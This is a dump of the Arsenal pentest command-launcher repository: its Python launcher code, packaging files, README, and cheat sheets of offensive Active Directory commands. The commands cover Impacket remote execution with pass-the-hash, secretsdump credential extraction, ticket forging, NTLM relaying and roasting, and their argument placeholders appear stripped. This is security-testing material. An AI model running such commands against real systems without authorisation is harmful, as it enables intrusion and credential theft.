```
├── .github
│   └── workflows
│       └── lint_python.yml
├── .gitignore
├── LICENSE
├── MANIFEST.in
├── PKGBUILD
├── README.md
├── addalias.sh
├── arsenal
│   ├── __init__.py
│   ├── __main__.py
│   ├── app.py
│   ├── data
│   │   └── cheats
│   │       ├── Active_directory
│   │       │   ├── Impacket
│   │       │   │   ├── impacket-execute.md
│   │       │   │   ├── impacket-kerberos.md
│   │       │   │   ├── impacket-secrets.md
│   │       │   │   ├── impacket-servertool-mitm.md
│   │       │   │   ├── impacket-smb_msrpc.md
│   │       │   │   └── impacket.md
│   │       │   ├── SCShell.md
│   │       │   ├── bloodhound.md
│   │       │   ├── certipy.md
│   │       │   ├── cme.md
│   │       │   ├── coercer.md
│   │       │   ├── kerberos.md
│   │       │   ├── laps.md
│   │       │   ├── lsassy.md
│   │       │   ├── machine_account_coerce_abuse.md
│   │       │   ├── mitm6.md
│   │       │   ├── nxc.md
│   │       │   ├── powerview.md
│   │       │   ├── responder.md
│   │       │   ├── rpcclient.md
│   │       │   └── rubeus.md
│   │       ├── Archive
│   │       │   ├── 7z.md
│   │       │   ├── binwalk.md
│   │       │   ├── gzip.md
│   │       │   ├── rar.md
│   │       │   ├── tar.md
│   │       │   ├── unblob.md
│   │       │   └── zip.md
│   │       ├── BruteForce
│   │       │   ├── hydra.md
│   │       │   └── wordlist
│   │       │       ├── cewl.md
│   │       │       └── crunch.md
│   │       ├── Cloud
│   │       │   └── aws.md
│   │       ├── Crypto
│   │       │   └── gpg.md
│   │       ├── Databases
│   │       │   └── redis.md
│   │       ├── Deserialization
│   │       │   ├── ysoserial.md
│   │       │   └── ysoserial.net.md
│   │       ├── Files
│   │       │   ├── Download
│   │       │   │   ├── bitsadmin.md
│   │       │   │   ├── certutil.md
│   │       │   │   └── powershell.md
│   │       │   └── Server
│   │       │       └── server.md
│   │       ├── Flashrom
│   │       │   └── flashrom.md
│   │       ├── Install
│   │       │   ├── brew.md
│   │       │   └── yum.md
│   │       ├── Language
│   │       │   ├── Java
│   │       │   │   ├── java.md
│   │       │   │   └── keytool.md
│   │       │   ├── c.md
│   │       │   ├── dotnet.md
│   │       │   ├── javascript.md
│   │       │   ├── nodejs.md
│   │       │   └── php.md
│   │       ├── Linux
│   │       │   ├── crontab.md
│   │       │   ├── grep.md
│   │       │   ├── i686-w64-mingw32-gcc.md
│   │       │   ├── linux.md
│   │       │   ├── misc.md
│   │       │   ├── sed.md
│   │       │   └── veracrypt.md
│   │       ├── Metasploit
│   │       │   ├── msf.md
│   │       │   └── searchsploit.md
│   │       ├── Mobile
│   │       │   └── Android
│   │       │       ├── android.md
│   │       │       ├── apktool.md
│   │       │       ├── jadx.md
│   │       │       └── objection.md
│   │       ├── Network
│   │       │   ├── chisel.md
│   │       │   ├── network.md
│   │       │   └── socat.md
│   │       ├── Password cracking
│   │       │   ├── crackfiles.md
│   │       │   ├── hashcat.md
│   │       │   └── john.md
│   │       ├── Password extraction
│   │       │   ├── LAPS.md
│   │       │   ├── lazagne.md
│   │       │   ├── mimikatz.md
│   │       │   └── procdump.md
│   │       ├── Protocol
│   │       │   ├── dns.md
│   │       │   ├── ftp.md
│   │       │   ├── ldap.md
│   │       │   ├── mssql.md
│   │       │   ├── mysql.md
│   │       │   ├── netbios.md
│   │       │   ├── nfs.md
│   │       │   ├── pop.md
│   │       │   ├── postgres.md
│   │       │   ├── rdp.md
│   │       │   ├── smb
│   │       │   │   ├── enum4linux.md
│   │       │   │   ├── smb.md
│   │       │   │   └── smbmap.md
│   │       │   ├── smtp.md
│   │       │   ├── snmp.md
│   │       │   ├── ssh.md
│   │       │   ├── telnet.md
│   │       │   ├── vnc.md
│   │       │   ├── winrm.md
│   │       │   └── x11.md
│   │       ├── Pwn
│   │       │   └── bof.md
│   │       ├── README.md
│   │       ├── README.rst
│   │       ├── Race Condition
│   │       │   └── racecondition.md
│   │       ├── ReverseShell
│   │       │   ├── msfvenom.md
│   │       │   ├── nc.md
│   │       │   ├── reverse_shell.md
│   │       │   └── web_shell.md
│   │       ├── SQL Injection
│   │       │   └── sqlmap.md
│   │       ├── Scan
│   │       │   ├── cve-bin-tool.md
│   │       │   ├── eyewitness.md
│   │       │   ├── gowitness.md
│   │       │   └── nmap.md
│   │       ├── Services
│   │       │   ├── service.md
│   │       │   └── systemctl.md
│   │       ├── Tools
│   │       │   ├── docker.md
│   │       │   ├── git.md
│   │       │   └── kubernetes.md
│   │       ├── Web
│   │       │   ├── drupwn.md
│   │       │   ├── fuzzer.md
│   │       │   ├── jwttool.md
│   │       │   ├── openssl.md
│   │       │   ├── tomcat.md
│   │       │   ├── web.md
│   │       │   └── wpscan.md
│   │       ├── Wifi
│   │       │   └── wifi.md
│   │       ├── Windows
│   │       │   ├── powershell.md
│   │       │   ├── whitelisting.md
│   │       │   └── windows.md
│   │       └── arsenal.md
│   └── modules
│       ├── __init__.py
│       ├── cheat.py
│       ├── check.py
│       ├── command.py
│       ├── config.py
│       └── gui.py
├── img
│   ├── arsenal.gif
│   ├── arsenal_update.png
│   └── logo.png
├── mindmap
│   ├── ACEs_xmind.png
│   ├── Abusing_ACEs.xmind
│   ├── Pentesting_MS_Exchange_Server_on_the_Perimeter.png
│   └── Pentesting_MS_Exchange_Server_on_the_Perimeter.xmind
├── my_cheats
│   └── .gitignore
├── pushtopip.sh
├── pyproject.toml
├── requirements.txt
├── run
└── setup.py
```

/.github/workflows/lint_python.yml:
--------------------------------------------------------------------------------
```yaml
name: lint_python
on: [pull_request, push]
jobs:
  lint_python:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-python@v2
      - run: pip install --upgrade pip wheel
      - run: pip install bandit black codespell flake8 flake8-bugbear
             flake8-comprehensions isort mypy pytest pyupgrade safety
      - run: bandit --recursive --skip B404,B602,B605 .
      - run: black --check . || true
      - run: codespell --ignore-words-list="fo,seh"
      - run: flake8 --ignore=B001,B007,C408,E111,E127,E203,E261,E265,E303,E402,E701,E711,E722,F401,F541,F841,W291,W293,W503
             --max-complexity=32 --max-line-length=118 --show-source --statistics .
      - run: isort --check-only --profile black . || true
      - run: pip install -r requirements.txt
      - run: mkdir --parents --verbose .mypy_cache
      - run: mypy --ignore-missing-imports --install-types --non-interactive . || true
      - run: pytest . || pytest --doctest-modules . || true
      - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true
      - run: safety check
```
--------------------------------------------------------------------------------

/.gitignore:
--------------------------------------------------------------------------------
```
.venv/
.idea/
__pycache__/
*.pyc
.arsenal.json
arsenal/data/cheats/.obsidian/
cheats/.obsidian/
cheats/Arsenal/.obsidian/
arsenal.egg-info/
arsenal_cli.egg-info/
build/
dist/
Pipfile.lock
Pipfile
```
--------------------------------------------------------------------------------

/MANIFEST.in:
--------------------------------------------------------------------------------
```
include LICENSE README.md requirements.txt run addalias.sh
include *.py
recursive-include arsenal/data/cheats *
recursive-include img *
recursive-exclude .obsidian *
recursive-exclude mindmap *
recursive-exclude my_cheats *
recursive-exclude cheats/.obsidian *
recursive-exclude arsenal.egg-info *
```
--------------------------------------------------------------------------------

/PKGBUILD:
--------------------------------------------------------------------------------
```bash
#Maintainer: Viking @Vikingfr
#Maintainer: Mayfly @M4yFly
#Maintainer: Erick Sanchez Vera "T1erno"

pkgname=arsenal
pkgver=1.2.1
pkgrel=1
pkgdesc='Arsenal is just a quick inventory and launcher for hacking programs'
url='https://github.com/Orange-Cyberdefense/arsenal'
arch=('any')
license=('GPL')
depends=('python>=3.7')
source=(${pkgname}::git+https://github.com/Orange-Cyberdefense/arsenal.git)
sha512sums=('SKIP')

build() {
  cd $pkgname
  python setup.py build
}

package() {
  cd $pkgname

  # NOTE: these three lines run on the build host during makepkg, so they append
  # the alias to the *packager's* dotfiles, not to those of the user installing
  # the package (addalias.sh prints the per-user alias lines instead)
  echo "alias a='arsenal'" >> ~/.bash_aliases
  echo "alias a='arsenal'" >> ~/.zshrc
  echo "alias a='arsenal'" >> ~/.bashrc

  python setup.py install --prefix=/usr --root="${pkgdir}" -O1 --skip-build
  install -Dm 644 LICENSE -t "${pkgdir}"/usr/share/licenses/${pkgname}
  install -Dm 644 README.md -t "${pkgdir}"/usr/share/doc/${pkgname}
}
```
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Arsenal

![](img/logo.png)

Arsenal is just a quick inventory, reminder and launcher for pentest commands.
This project, written by pentesters for pentesters, simplifies the use of all the hard-to-remember commands.

![](img/arsenal.gif)

In arsenal you can search for a command, select one and it is prefilled directly in your terminal. This functionality is independent of the shell used: arsenal emulates real user input (with TTY attributes and an IOCTL), so it works with all shells and your commands end up in the shell history.

You have to enter arguments if needed, but arsenal supports global variables.
For example, during a pentest we can set the variable `ip` so that every command using an ip is prefilled with the right one.

To do that you just have to enter the following command in arsenal:
```
>set ip=10.10.10.10
```

Authors:
* Guillaume Muh
* mayfly

This project is inspired by navi, because the original version was in bash and too hard to understand to add features.


## Arsenal new features

![](img/arsenal_update.png)

- New colors
- Add tmux new pane support (with -t)
- Add default values in cheatsheets commands with ``
- Support description inside cheatsheets
- New categories and Tags
- New cheatsheets
- Add yml support (thx @0xswitch)
- Add fzf support with ctrl+t (thx @mgp25)
- Add prefix to commands generated (with -f)

## Install & Launch
- with pip:
```
python3 -m pip install arsenal-cli
```

- run (we also advise you to add this alias: `alias a='arsenal'`)
```
arsenal
```

- manually:
```
git clone https://github.com/Orange-Cyberdefense/arsenal.git
cd arsenal
python3 -m pip install -r requirements.txt
./run
```

Inside your .bashrc or .zshrc, add an alias to the `run` script; the addalias.sh script prints the lines to add:
```
./addalias.sh
```

- Also if you are an Arch user you can install from the AUR:
```bash
git clone https://aur.archlinux.org/arsenal.git
cd arsenal
makepkg -si
```
- Or with an AUR helper like yay:
```bash
yay -S arsenal
```

## Launch in tmux mode

```
./run -t     # if you launch arsenal in a tmux window with one pane, it will split the window and send the command to the other pane without quitting arsenal
             # if the window is already split, the command will be sent to the other pane without quitting arsenal
./run -t -e  # just like the -t mode but with direct execution in the other pane without quitting arsenal
```

## Add external cheatsheets

You can add your own cheatsheets inside the my_cheats folder or in the ~/.cheats folder.

You can also add additional paths to the file `/arsenal/modules/config.py`;
arsenal reads `.md` (MarkDown) and `.rst` (RestructuredText).

```
CHEATS_PATHS = [
    join(BASEPATH, "cheats"),  # DEFAULT
    join(HOMEPATH, "docs/my_cheats")
]
```

Cheatsheet examples are in `/cheats`: `README.md` and `README.rst`

## Add a prefix to generated commands

In order to prefix commands generated by arsenal you need to set the `arsenal_prefix_cmd` global variable.

For example, if you need your commands to be prefixed with `proxychains -q`:
```
>set arsenal_prefix_cmd=proxychains -q
```

then you can run arsenal with the prefix option:
```bash
arsenal -f
```

## Troubleshooting

If you get an error on color init, try:
```
export TERM='xterm-256color'
```

--

If you have the following exception when running Arsenal:
```
ImportError: cannot import name 'FullLoader'
```
First, check that the requirements are installed:
```
pip install -r requirements.txt
```
If the exception is still there:
```
pip install -U PyYAML
```

--

If you encounter an exception similar to the following (contains TIOCSTI in strace) when running Arsenal:
```
[...]
fcntl.ioctl(stdin, termios.TIOCSTI, c)
OSError: [Errno 5] Input/output error
```
Then you may need to re-enable TIOCSTI. Please run the following command as root to fix this issue for the current session:
```
sysctl -w dev.tty.legacy_tiocsti=1
```
If you want this workaround to survive a reboot, add the following configuration to the sysctl.conf file and reboot:
```
echo "dev.tty.legacy_tiocsti=1" >> /etc/sysctl.conf
```
This sysctl only exists because Linux 6.2 disabled TIOCSTI by default: the ioctl lets any process holding a file descriptor on a terminal push bytes into that terminal's input queue as if they had been typed, which is what arsenal relies on for prefilling and also what made it a long-standing sandbox and restricted-shell escape primitive. The setting is system-wide, so on shared or hardened hosts prefer the output modes that do not need TIOCSTI (`-t` tmux, `-p` print, `-x` clipboard, `-o` file or `-e` exec).
More information is available in the issue [https://github.com/Orange-Cyberdefense/arsenal/issues/77](https://github.com/Orange-Cyberdefense/arsenal/issues/77)


## Mindmap
- Active directory mindmap
    - Due to the CSP on GitHub when you open the svg, we moved the AD mindmap and its source to this repository: [https://github.com/Orange-Cyberdefense/ocd-mindmaps](https://github.com/Orange-Cyberdefense/ocd-mindmaps)

[https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg)

- AD mindmap black version
![](./mindmap/pentest_ad_black.png)

- Exchange Mindmap (thx to @snovvcrash)
![](./mindmap/Pentesting_MS_Exchange_Server_on_the_Perimeter.png)

- Active directory ACE mindmap
![](./mindmap/ACEs_xmind.png)

## TODO cheatsheets

### reverse shell
- [X] msfvenom
- [X] php
- [X] python
- [X] perl
- [X] powershell
- [X] java
- [X] ruby

### whitebox analysis grep regex
- [X] php
- [X] nodejs
- [X] hash

### Tools

#### smb
- [X] enum4linux
- [X] smbmap
- [ ] smbget
- [X] rpcclient
- [ ] rpcinfo
- [X] nbtscan
- [X] impacket

#### kerberos & AD
- [X] impacket
- [X] bloodhound
- [X] rubeus
- [ ] powerview
- [ ] shadow credentials attack
- [ ] samaccountname attack

#### MITM
- [X] mitm6
- [X] responder

#### Unserialize
- [X] ysoserial
- [ ] ysoserial.net

### bruteforce & pass cracking
- [X] hydra
- [X] hashcat
- [X] john

#### scan
- [X] nmap
- [X] eyewitness
- [X] gowitness

#### fuzz
- [X] gobuster
- [X] ffuf
- [X] wfuzz

#### DNS
- [X] dig
- [X] dnsrecon
- [X] dnsenum
- [X] sublist3r

#### rpc
- [ ] rpcbind

#### netbios-ssn
- [X] snmpwalk
- [X] snmp-check
- [X] onesixtyone

#### sql
- [X] sqlmap

#### oracle
- [ ] oscanner
- [ ] sqlplus
- [ ] tnscmd10g

#### mysql
- [X] mysql

#### nfs
- [X] showmount

#### rdp
- [X] xfreerdp
- [X] rdesktop
- [ ] ncrack

#### mssql
- [X] sqsh

#### winrm
- [X] evilwinrm

#### redis
- [ ] redis-cli

#### postgres
- [X] psql
- [ ] pgdump

#### vnc
- [X] vncviewer

#### x11
- [X] xspy
- [X] xwd
- [X] xwininfo

#### ldap
- [X] ldapsearch

#### https
- [ ] sslscan

#### web
- [ ] burp
- [X] nikto
- [ ] tplmap

#### app web
- [X] drupwn
- [X] wpscan
- [ ] nuclei
--------------------------------------------------------------------------------

/addalias.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash

DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
echo "# To permanently add arsenal as the command 'a', add this to your ~/.bashrc, ~/.zshrc or ~/.bash_aliases depending on your shell configuration:"
echo "alias a='${DIR}/run'"

echo "Examples:"
echo "echo \"alias a='${DIR}/run'\" >> ~/.bash_aliases"
echo "echo \"alias a='${DIR}/run'\" >> ~/.zshrc"
echo "echo \"alias a='${DIR}/run'\" >> ~/.bashrc"
echo "echo \"alias a='${DIR}/run'\" >> ~/.config/fish/config.fish"
```
--------------------------------------------------------------------------------

/arsenal/__init__.py:
--------------------------------------------------------------------------------
```python
"""
pentest command launcher
"""

__author__ = 'Guillaume Muh, mayfly'
__author_email__ = 'no-reply@orange.com'
__license__ = 'GPL-3.0'
__url__ = 'https://github.com/Orange-Cyberdefense/arsenal'
__version__ = '1.2.7'
```
--------------------------------------------------------------------------------

/arsenal/__main__.py:
--------------------------------------------------------------------------------
```python
"""
Main entry point for running Arsenal as a module.
"""
import sys

if sys.version_info < (3, 6):
    raise SystemExit(
        "Sorry, Python 3.6 (or greater) is required to run Arsenal. ABORTING."
    )

from .app import main

if __name__ == "__main__":
    main()
```
--------------------------------------------------------------------------------

/arsenal/app.py:
--------------------------------------------------------------------------------
```python
import argparse
import json
import os
import fcntl
import sys
import termios
import re
import time

# arsenal
from . import __version__
from .modules import config
from .modules import cheat
from .modules import check
from .modules import gui as arsenal_gui


class App:

    def __init__(self):
        pass

    def get_args(self):
        examples = '''examples:
    arsenal
    arsenal --copy
    arsenal --print

You can manage global variables with:
    >set GLOBALVAR1=
    >show
    >clear

(cmd starting with '>' are internals cmd)
'''

        parser = argparse.ArgumentParser(
            prog="arsenal",
            description='arsenal v{} - Pentest command launcher'.format(__version__),
            epilog=examples,
            formatter_class=argparse.RawTextHelpFormatter
        )

        group_out = parser.add_argument_group('output [default = prefill]')
        group_out.add_argument('-p', '--print', action='store_true', help='Print the result')
        group_out.add_argument('-o', '--outfile', action='store', help='Output to file')
        group_out.add_argument('-x', '--copy', action='store_true', help='Output to clipboard')
        group_out.add_argument('-e', '--exec', action='store_true', help='Execute cmd')
        group_out.add_argument('-t', '--tmux', action='store_true', help='Send command to tmux panel')
        group_out.add_argument('-c', '--check', action='store_true', help='Check the existing commands')
        group_out.add_argument('-f', '--prefix', action='store_true', help='command prefix')
        group_out.add_argument('--no-tags', action='store_false', help='Whether or not to show the'
                               ' tags when drawing the cheats')
        parser.add_argument('-V', '--version', action='version', version='%(prog)s (version {})'.format(__version__))

        return parser.parse_args()

    def run(self):
        args = self.get_args()

        # load cheatsheets
        cheatsheets = cheat.Cheats().read_files(config.CHEATS_PATHS, config.FORMATS,
                                                config.EXCLUDE_LIST)

        if args.check:
            check.check(cheatsheets)
        else:
            self.start(args, cheatsheets)

    def start(self, args, cheatsheets):
        arsenal_gui.Gui.with_tags = args.no_tags

        # create gui object
        gui = arsenal_gui.Gui()
        while True:
            # launch gui
            cmd = gui.run(cheatsheets, args.prefix)

            if cmd is None:
                sys.exit(0)

            # Internal CMD
            elif cmd.cmdline[0] == '>':
                if cmd.cmdline == ">exit":
                    break
                elif cmd.cmdline == ">show":
                    if os.path.exists(config.savevarfile):
                        with open(config.savevarfile, 'r') as f:
                            arsenalGlobalVars = json.load(f)
                        for k, v in arsenalGlobalVars.items():
                            print(k + "=" + v)
                    break
                elif cmd.cmdline == ">clear":
                    with open(config.savevarfile, "w") as f:
                        f.write(json.dumps({}))
                    self.run()
                elif re.match(r"^\>set( [^= ]+=[^= ]+)+$", cmd.cmdline):
                    # Load previous global var
                    if os.path.exists(config.savevarfile):
                        with open(config.savevarfile, 'r') as f:
                            arsenalGlobalVars = json.load(f)
                    else:
                        arsenalGlobalVars = {}
                    # Add new global var
                    varlist = re.findall("([^= ]+)=([^= ]+)", cmd.cmdline)
                    for v in varlist:
                        arsenalGlobalVars[v[0]] = v[1]
                    with open(config.savevarfile, "w") as f:
                        f.write(json.dumps(arsenalGlobalVars))
                else:
                    print("Arsenal: invalid internal command..")
                    break

            # OPT: Copy CMD to clipboard
            elif args.copy:
                try:
                    import pyperclip
                    pyperclip.copy(cmd.cmdline)
                except ImportError:
                    pass
                break

            # OPT: Only print CMD
            elif args.print:
                print(cmd.cmdline)
                break

            # OPT: Write in file
            elif args.outfile:
                with open(args.outfile, 'w') as f:
                    f.write(cmd.cmdline)
                break

            # OPT: Exec
            elif args.exec and not args.tmux:
                os.system(cmd.cmdline)
                break

            elif args.tmux:
                try:
                    import libtmux
                    try:
                        server = libtmux.Server()
                        session = server.list_sessions()[-1]
                        window = session.attached_window
                        panes = window.panes
                        if len(panes) == 1:
                            # split window to get more pane
                            pane = window.split_window(attach=False)
                            time.sleep(0.3)
                        else:
                            pane = panes[-1]
                        # send command to other pane and switch pane
                        if args.exec:
                            pane.send_keys(cmd.cmdline)
                        else:
                            pane.send_keys(cmd.cmdline, enter=False)
                        pane.select_pane()
                    except libtmux.exc.LibTmuxException:
                        # tmux not reachable: fall back to the TIOCSTI prefill
                        self.prefil_shell_cmd(cmd)
                    break
                except ImportError:
                    self.prefil_shell_cmd(cmd)
                    break
            # DEFAULT: Prefill Shell CMD
            else:
                self.prefil_shell_cmd(cmd)
                break

    def prefil_shell_cmd(self, cmd):
        stdin = 0
        # save TTY attribute for stdin
        oldattr = termios.tcgetattr(stdin)
        # create new attributes to fake input
        newattr = termios.tcgetattr(stdin)
        # disable echo in stdin -> only inject cmd in stdin queue (with TIOCSTI)
        newattr[3] &= ~termios.ECHO
        # enable non canonical mode -> ignore special editing characters
        newattr[3] &= ~termios.ICANON
        # use the new attributes
        termios.tcsetattr(stdin, termios.TCSANOW, newattr)
        # write the selected command in stdin queue, one character at a time
        try:
            for c in cmd.cmdline:
                fcntl.ioctl(stdin, termios.TIOCSTI, c)
        except OSError:
            message = "========== OSError ============\n"
            message += "Arsenal needs TIOCSTI enabled for running\n"
            message += "Please run the following commands as root to fix this issue on the current session :\n"
            message += "sysctl -w dev.tty.legacy_tiocsti=1\n"
            message += "If you want this workaround to survive a reboot,\n"
            message += "add the following configuration to sysctl.conf file and reboot :\n"
            message += "echo \"dev.tty.legacy_tiocsti=1\" >> /etc/sysctl.conf\n"
            message += "More details about this bug here: https://github.com/Orange-Cyberdefense/arsenal/issues/77"
            print(message)
        finally:
            # restore TTY attribute for stdin, even when the ioctl failed
            termios.tcsetattr(stdin, termios.TCSADRAIN, oldattr)


def main():
    try:
        App().run()
    except KeyboardInterrupt:
        sys.exit(0)


if __name__ == "__main__":
    main()
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket-execute.md:
--------------------------------------------------------------------------------
# impacket

% impacket, windows, exec

## PSEXEC with username
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service (using \pipe\svcctl via SMB)

```
psexec.py /:@
```

## PSEXEC with pass the Hash (pth)
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service (using \pipe\svcctl via SMB)

```
psexec.py -hashes @
```

## PSEXEC with kerberos
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service (using \pipe\svcctl via SMB)

```
export KRB5CCNAME=; psexec.py -dc-ip -target-ip > -no-pass -k /@
```

## SMBEXEC with username
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service 'BTOBTO' (using temp bat files via SMB)
```
smbexec.py /:@
```

## SMBEXEC with pass the Hash (pth)
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service 'BTOBTO' (using temp bat files via SMB)
```
smbexec.py -hashes @
```

## SMBEXEC with kerberos
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
create a new service 'BTOBTO' (using temp bat files via SMB)
```
export KRB5CCNAME=; smbexec.py -dc-ip -target-ip > -no-pass -k /@
```

## wmiexec
#plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT
Execute a command shell without touching the disk or running a new service, using DCOM

```
wmiexec.py /:@
```

## wmiexec with pass the hash (pth)
#plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT

Execute a command shell without touching the disk or running a new service, using DCOM

```
wmiexec.py -hashes @
```

## atexec - execute command via the task scheduler
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
Using \pipe\atsvc via SMB

```
atexec.py /:@ "command"
```

## atexec pass the hash (pth)
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
Execute command via the task scheduler (using \pipe\atsvc via SMB)

```
atexec.py -hashes @ "command"
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket-kerberos.md:
--------------------------------------------------------------------------------
# Impacket

% impacket, windows, kerberos, 88

## GetNPUsers without password to get TGT (ASREPRoasting)
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
```
GetNPUsers.py / -no-pass -request -format hashcat
```

## GetNPUsers - attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' (ASREPRoasting)
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
```
GetNPUsers.py -dc-ip / -usersfile -format hashcat
```

## GetUserSPNs - find Service Principal Names that are associated with a normal user account (kerberoasting)
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
```
GetUserSPNs.py -request -dc-ip /:
```

## MS14-068 - goldenPac
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
```
goldenPac.py -dc-ip /:''@
```

## Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi.
#plateform/linux #target/local #cat/ATTACK/EXPLOIT
```
ticketer.py -nthash -domain-sid -domain
```

## Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi.
#plateform/linux #target/local #cat/ATTACK/EXPLOIT
```
ticketer.py -nthash -domain-sid -domain -spn
```

## TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket
#plateform/linux #target/local #cat/UTILS
```
ticketConverter.py
```

## Silver ticket - impersonate user
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
```
getST.py -spn cifs/ /\$ -impersonate
```

## GetTGT - request a TGT and save it as ccache for a given password, hash or aesKey
#plateform/linux #target/remote #cat/UTILS
```
getTGT.py -dc-ip -hashes : /
```

## GetADUsers - gather data about the domain's users and their corresponding email addresses
#plateform/linux #target/remote #cat/RECON
```
GetADUsers.py -all /: -dc-ip
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket-secrets.md:
--------------------------------------------------------------------------------
# Impacket

% impacket, windows, smb, 445

## samrdump - system accounts, shares, etc. (dump info from the Security Account Manager (SAM))
#plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
```
samrdump.py /:@
```

## secretsdump
#plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py '/:'@
```

## secretsdump local dump - extract hashes from the SAM database
#plateform/linux #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py -system -sam LOCAL
```

## secretsdump local dump - extract hashes from ntds.dit
#plateform/linux #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py -ntds -system -hashes LOCAL -outputfile
```

## secretsdump - anonymous get administrator
zerologon
#plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py /\$/@ -no-pass -just-dc-user "Administrator"
```

## secretsdump - remote extract
#plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py -just-dc-ntlm -outputfile /:@
```

## secretsdump - remote extract + users info
#plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER
```
secretsdump.py -just-dc -pwd-last-set -user-status -outputfile /:@
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket-servertool-mitm.md:
--------------------------------------------------------------------------------
# Impacket

## smbserver - share smb folder
#plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE

A Python implementation of an SMB server. Allows you to quickly set up shares and user accounts.

```
smbserver.py
```

## smbserver - share smb folder with authentication
#plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE

```
smbserver.py -username -password
```

## ntlmrelay - host a payload that will automatically be served to the remote host connecting
#plateform/linux #target/serve #cat/ATTACK/MITM

```
ntlmrelayx.py -tf -smb2support -e
```

## ntlmrelay - socks
#plateform/linux #target/serve #cat/ATTACK/MITM
```
ntlmrelayx.py -tf -socks -smb2support
```

## ntlmrelay - authenticate and dump hash
#plateform/linux #target/serve #cat/ATTACK/MITM
```
ntlmrelayx.py -tf -smb2support
```

## ntlmrelay - to use with mitm6 - relay to target
#plateform/linux #target/serve #cat/ATTACK/MITM
Next use the socks with proxychains:
proxychains smbclient //ip/Users -U domain/user

```
ntlmrelayx.py -6 -wh -t smb:// -l /tmp -socks -debug
```

## ntlmrelay - to use with mitm6 - delegate access
#plateform/linux #target/serve #cat/ATTACK/MITM
```
ntlmrelayx.py -t ldaps:// -wh --delegate-access
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket-smb_msrpc.md:
--------------------------------------------------------------------------------
# impacket

## smbclient - connect to smb on the target
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT

A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either a username and password or a username and hashes combination.

-hashes :
-no-pass -k : kerberos authentication

```
smbclient.py /:@
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/Impacket/impacket.md:
--------------------------------------------------------------------------------
# Impacket

% impacket, windows, smb, 445

## lookupsid - SID User Enumeration, extract the information about what users exist and their data.
#plateform/linux #target/remote #cat/RECON

```
lookupsid.py /:@
```

## reg - query registry info remotely
#plateform/linux #target/remote #cat/RECON
```
reg.py /:@ query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
```

## rpcdump - list rpc endpoints
#plateform/linux #target/remote #cat/RECON
```
rpcdump.py /:@
```

## services.py - (start, stop, delete, read status, config, list, create and change any service) remote
#plateform/linux #target/remote #cat/RECON #cat/ATTACK/EXPLOIT
```
services.py /:@
```

## getarch - find target architecture (64 or 32 bits)
#plateform/linux #target/remote #cat/RECON
```
getArch.py -target
```

## netview - enumeration tool (ip/shares/sessions/logged users) - needs dns set
#plateform/linux #target/remote #cat/RECON
```
netview.py / -target -users
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/SCShell.md:
--------------------------------------------------------------------------------
# SCShell

% SCShell, psexec, stealthy, DCERPC

## stealthy psexec
#plateform/linux #target/remote #cat/ATTACK/CONNECT

no service created, no smb used, no file dropped
https://github.com/Mr-Un1k0d3r/SCShell

```
python3 scshell.py -service-name -hashes : /@
```
--------------------------------------------------------------------------------

/arsenal/data/cheats/Active_directory/bloodhound.md:
--------------------------------------------------------------------------------
# bloodhound

% bloodhound, Active directory enumeration

## start neo4j server
#plateform/linux #target/serve #cat/UTILS
https://neo4j.com/docs/

```bash
neo4j start
```

## bloodhound - start the GUI
#plateform/linux #target/local #cat/RECON
https://github.com/BloodHoundAD/BloodHound

```bash
bloodhound
```

